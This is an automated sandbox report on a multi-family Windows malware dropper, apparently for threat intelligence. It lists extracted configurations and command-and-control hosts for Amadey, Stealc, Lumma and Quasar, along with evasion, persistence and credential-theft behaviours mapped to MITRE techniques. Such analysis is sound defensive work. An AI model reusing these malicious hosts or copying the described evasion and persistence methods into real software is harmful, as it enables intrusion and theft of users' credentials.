amadey | edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58

Analysis

max time kernel
130s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
30/03/2025, 14:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

84c300a105cb5e140c8c91e2c6ead590
SHA1

5bd18b75d71b2824913a508ce28db8d4c2a936b9
SHA256

edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58
SHA512

eec8f1abe337ec6e09cdf613c015a1cf84a58217f063d884e4a4ef8a925f17f8c7c869ce81e081e81382cb5860cdc46f1b4cb96923b97c0d41e76dd98d99f106
SSDEEP

24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:oTvC/MTQYxsWR7a06

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

lumma

https://cosmosyf.top/GOsznj

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/7528-30152-0x00000000008D0000-0x0000000000D2E000-memory.dmp	healer
behavioral2/memory/7528-30153-0x00000000008D0000-0x0000000000D2E000-memory.dmp	healer
behavioral2/memory/7528-32461-0x00000000008D0000-0x0000000000D2E000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/4692-236-0x0000000005630000-0x000000000564A000-memory.dmp	family_quasar
behavioral2/memory/4692-235-0x00000000088C0000-0x0000000008A14000-memory.dmp	family_quasar

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3340 created 2600	3340	MSBuild.exe	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7233a9ab97.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b27646bfd0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c12c863c84.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	42c2eafe9e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cbe2fbdc64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	001110901b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6501a0b69e.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
24	1784	powershell.exe
68	4692	powershell.exe
98	4692	powershell.exe
164	4692	powershell.exe
224	4692	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4848	powershell.exe
1172	powershell.exe
1784	powershell.exe
4692	powershell.exe

Downloads MZ/PE file 8 IoCs

flow	pid	Process
88	6028	rapes.exe
92	6028	rapes.exe
31	6028	rapes.exe
90	1624	svchost.exe
97	1276	svchost015.exe
111	208	svchost015.exe
112	6028	rapes.exe
24	1784	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b30be13d.sys	350ea713.exe
File created	C:\Windows\System32\Drivers\klupd_b30be13da_arkmon.sys	350ea713.exe
File created	C:\Windows\System32\Drivers\klupd_b30be13da_klbg.sys	350ea713.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b30be13d\ImagePath = "System32\\Drivers\\b30be13d.sys"	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon\ImagePath = "System32\\Drivers\\klupd_b30be13da_arkmon.sys"	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klbg\ImagePath = "System32\\Drivers\\klupd_b30be13da_klbg.sys"	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klark\ImagePath = "System32\\Drivers\\klupd_b30be13da_klark.sys"	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_mark\ImagePath = "System32\\Drivers\\klupd_b30be13da_mark.sys"	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b30be13da_arkmon.sys"	350ea713.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7233a9ab97.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	001110901b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c12c863c84.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	42c2eafe9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cbe2fbdc64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7233a9ab97.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b27646bfd0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	001110901b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b27646bfd0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6501a0b69e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	42c2eafe9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c12c863c84.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6501a0b69e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cbe2fbdc64.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
4648	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_533a3e6b.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_533a3e6b.cmd	powershell.exe

Executes dropped EXE 28 IoCs

pid	Process
5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
6028	rapes.exe
2424	825212ef2a.exe
4184	7233a9ab97.exe
1276	svchost015.exe
4304	001110901b.exe
208	svchost015.exe
1028	ee4dd30ae4.exe
3392	kO2IdCz.exe
3620	rapes.exe
3852	Rm3cVPI.exe
1772	TbV75ZR.exe
5020	7IIl2eE.exe
5596	u75a1_003.exe
1232	Passwords.com
3348	b27646bfd0.exe
5836	tzutil.exe
4648	w32tm.exe
1400	EPTwCQd.exe
6624	c12c863c84.exe
6792	rapes.exe
2736	b64e32f6b4.exe
7268	6501a0b69e.exe
7644	63aa33a8.exe
8504	350ea713.exe
9064	42c2eafe9e.exe
11148	101b264521.exe
7528	cbe2fbdc64.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	42c2eafe9e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	cbe2fbdc64.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	7233a9ab97.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	6501a0b69e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	001110901b.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	b27646bfd0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	c12c863c84.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys	350ea713.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys\ = "Driver"	350ea713.exe

Loads dropped DLL 26 IoCs

pid	Process
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cbe2fbdc64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381880101\\cbe2fbdc64.exe"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	kO2IdCz.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6501a0b69e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381850101\\6501a0b69e.exe"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\1f7685b3-e41e-47a2-8c80-0201ae6327f6 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{6024cd18-4de4-4bae-a78c-2c9b25e934d0}\\1f7685b3-e41e-47a2-8c80-0201ae6327f6.cmd\""	350ea713.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\42c2eafe9e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381860101\\42c2eafe9e.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\101b264521.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381870101\\101b264521.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	350ea713.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	b27646bfd0.exe
File opened for modification	\??\PhysicalDrive0	350ea713.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000c000000024090-29925.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3192	tasklist.exe
3164	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
6028	rapes.exe
4184	7233a9ab97.exe
4304	001110901b.exe
3620	rapes.exe
3348	b27646bfd0.exe
6624	c12c863c84.exe
6792	rapes.exe
7268	6501a0b69e.exe
9064	42c2eafe9e.exe
7528	cbe2fbdc64.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4184 set thread context of 1276	4184	7233a9ab97.exe	107
PID 4304 set thread context of 208	4304	001110901b.exe	110
PID 1028 set thread context of 5344	1028	ee4dd30ae4.exe	114
PID 1772 set thread context of 3340	1772	TbV75ZR.exe	138
PID 1400 set thread context of 6152	1400	EPTwCQd.exe	172

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	63aa33a8.exe
File opened (read-only)	\??\VBoxMiniRdrDN	350ea713.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	350ea713.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	350ea713.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4576	3340	WerFault.exe	138

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	350ea713.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	825212ef2a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	42c2eafe9e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b27646bfd0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6501a0b69e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	63aa33a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	101b264521.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	001110901b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7233a9ab97.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cbe2fbdc64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c12c863c84.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b64e32f6b4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	101b264521.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	101b264521.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2356	taskkill.exe
1000	taskkill.exe
1832	taskkill.exe
11404	taskkill.exe
12192	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings	cmd.exe
